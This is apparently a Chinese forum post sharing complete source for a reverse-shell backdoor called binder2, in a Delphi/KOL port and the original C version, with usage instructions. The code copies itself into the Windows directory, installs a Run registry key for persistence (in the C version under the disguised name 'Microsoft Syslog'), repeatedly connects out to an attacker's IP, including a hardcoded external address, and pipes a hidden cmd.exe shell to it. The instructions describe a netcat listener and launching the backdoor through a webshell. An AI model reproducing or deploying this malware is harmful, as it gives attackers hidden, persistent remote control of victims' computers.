Winsock2为kol socket单元文件,修改自c版代码binder2.c<br>
使用说明:<br>
<br>
binder2.exe 反弹式后门程序<br>
<br>
简介:<br>
<br>
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.<br>
<br>
用法:<br>
<br>
1. 在本地机器监听一个端口:<br>
<br>
netcat -vv -l -p 80<br>
<br>
2. 通过webShell或是别的什么运行后门:<br>
<br>
kol_binder2 80 youIPadd<br>
<br>
3. 本地监听端口将截获一个来自远程主机的cmd.<br>
<br>
注意:<br>
<br>
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.<br>
程序会复制自身到c:\winnt\下名为binder2.exe,并在<br>
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 kol_binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)<br>
<br>
Code by hnxyy <br>
Date:2005/6/16<br>
QQ:19026695<br>
火狐技术联盟[F.S.T]<br>
<br>
program kol_binder2;<br>
<br>
uses<br>
Windows,Winsock2,winsock;<br>
<br>
function StrToIntDef(const S: string; Default: Integer): Integer;<br>
var<br>
E: Integer;<br>
begin<br>
Val(S, Result, E);<br>
if E <> 0 then Result := Default;<br>
end;<br>
<br>
var<br>
mykey :HKEY;<br>
buffer,cmd :array[0..MAX_PATH] of char;<br>
si :TStartupInfo;<br>
wd :TWSAdata;<br>
sock :TSocket;<br>
pi :TProcessInformation;<br>
sin :TSockAddrIn;<br>
ip :pchar;<br>
port :integer;<br>
begin<br>
GetWindowsDirectory(buffer,MAX_PATH);<br>
lstrcat(buffer,'\binder2.exe');<br>
GetModuleFileName(hInstance,cmd,MAX_PATH);<br>
CopyFile(cmd,buffer,false);<br>
RegOpenKeyEx(HKEY_CURRENT_USER,'Software\Microsoft\Windows\CurrentVersion\Run',0,KEY_ALL_ACCESS,mykey);<br>
RegSetValueEx(mykey,'binder2',0,REG_SZ,@buffer,sizeof(buffer));<br>
<br>
if (ParamCount=1) and (lstrcmpi(lpstr(ParamStr(1)),'/kill')=0) then<br>
begin<br>
RegDeleteValue(MyKey,'binder2');<br>
DeleteFile(buffer);<br>
ExitProcess(0);<br>
end;<br>
<br>
if (ParamCount<1) or (ParamCount>2) then<br>
begin<br>
port :=1234;<br>
ip :='127.0.0.1';<br>
end else<br>
begin<br>
port :=StrToIntDef(ParamStr(1),0);<br>
ip :=lpstr(ParamStr(2));<br>
end;<br>
<br>
//FillChar(si,sizeof(si),#0);<br>
//WSAStartup($101,wd);<br>
//sock :=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);<br>
ZeroMemory(@si, SizeOf(si));<br>
WSAStartup(MAKEWORD(1,1),wd);<br>
sock :=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, nil, 0, 0);<br>
sin.sin_family :=AF_INET;<br>
sin.sin_port :=htons(port);<br>
sin.sin_addr.s_addr :=inet_addr(ip);<br>
while (connect(sock,sin,sizeof(sin))<>0) do Sleep(30000);<br>
<br>
si.cb :=sizeof(si);<br>
si.dwFlags :=STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;<br>
si.wShowWindow :=SW_HIDE;<br>
si.hStdInput :=sock;<br>
si.hStdOutput :=sock;<br>
si.hStdError :=sock;<br>
<br>
CreateProcess(nil,'cmd.exe',nil,nil,TRUE,CREATE_NEW_CONSOLE,nil,nil,si,pi);<br>
WaitForSingleObject(pi.hProcess, INFINITE);<br>
CloseHandle(pi.hProcess);<br>
CloseHandle(pi.hThread);<br>
CloseSocket(sock);<br>
WSACleanup;<br>
end.<br>
<br>
<br>
<br>
附 binder2.exe c 版代码<br>
<br>
/*<br>
* Trivial Reverse cmd binder<br>
*<br>
* When LAN is full, ThreaT will walk on your network<br>
*<br>
******************************<br>
<br>
compile : cl.exe binder2.c<br>
<br>
<br>
Usage<br>
_____<br>
<br>
binder2.exe (backdoor the current workstation & connect to default IP for bind a cmd shell on default Port)<br>
binder2.exe 123 (connect to default IP & bind a cmd shell on port 123)<br>
binder2.exe 123 10.0.0.1 (connect to 10.0.0.1 & bind a cmd shell on port 123)<br>
binder2 /kill (remove startkey of the registery)<br>
<br>
<br>
******************************<br>
*<br>
* ThreaT@Ifrance.com<br>
* http://s0h.cc/~threat/<br>
*<br>
*/<br>
<br>
<br>
#include <winsock2.h><br>
<br>
#pragma comment(lib, "ws2_32.lib")<br>
#pragma comment(lib, "advapi32.lib")<br>
#pragma comment(lib, "user32.lib")<br>
<br>
/* Win entry point (sa evite d'avoir une grosse console crade qui s'affiche ) */<br>
<br>
int WINAPI WinMain(<br>
HINSTANCE hInstance,<br>
HINSTANCE hPrevInstance, <br>
LPSTR lpszCmdLine,<br>
int nCmdShow <br>
)<br>
{ <br>
<br>
WSADATA wd; <br>
HKEY MyKey;<br>
SOCKET sock; <br>
STARTUPINFO si; <br>
PROCESS_INFORMATION pi; <br>
struct sockaddr_in sin; <br>
char buffer[MAX_PATH], cmd[MAX_PATH], *p,<br>
<br>
IP[16] = "81.91.66.30\x00"; // adresse IP par default (ici www.s0h.cc)<br>
unsigned short port = 1234; // port par default<br>
<br>
/* backdoor le bordel */<br>
GetWindowsDirectory (buffer,MAX_PATH);<br>
lstrcat (buffer,"\\syslog.exe\x00");<br>
GetModuleFileName (NULL,cmd,MAX_PATH);<br>
<br>
CopyFile (cmd,buffer,FALSE);<br>
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",(DWORD)NULL,KEY_ALL_ACCESS,&MyKey);<br>
RegSetValueEx (MyKey,"Microsoft Syslog",(DWORD)NULL,REG_SZ,( CONST BYTE * )&buffer,strlen (buffer));<br>
<br>
/* traite les eventuels arguments */<br>
p = strtok (lpszCmdLine," "); <br>
if (lpszCmdLine[0] == '/' || IsCharAlphaNumeric(lpszCmdLine[0]))<br>
{<br>
if (!lstrcmpi (lpszCmdLine,"/kill")) { RegDeleteValue(MyKey,"Microsoft Syslog"); ExitProcess (0);}<br>
else port = atoi (lpszCmdLine);<br>
<br>
if ( p = strtok (NULL," ") ) lstrcpyn (IP,p,16);<br>
}<br>
<br>
/* prepare la sauce */<br>
memset(&si, 0, sizeof(si)); <br>
WSAStartup(MAKEWORD( 1, 1 ), &wd); <br>
<br>
// David Litchfield in his Blackhat talk said... (PJ)<br>
sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); <br>
<br>
sin.sin_family = AF_INET; <br>
sin.sin_port = htons(port); <br>
sin.sin_addr.s_addr = inet_addr(IP); <br>
<br>
/* tente une connexion toute les 30 secondes */<br>
while ( connect(sock, (struct sockaddr*)&sin, sizeof (sin)) ) Sleep (30000); <br>
<br>
/* balance le shell et ce casse */<br>
si.cb = sizeof(si); <br>
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; <br>
si.wShowWindow=SW_HIDE;<br>
si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock; <br>
CreateProcess(NULL,"cmd.exe",NULL,NULL, TRUE, 0,0, NULL, &si, &pi ); <br>
return 0; <br>
} |
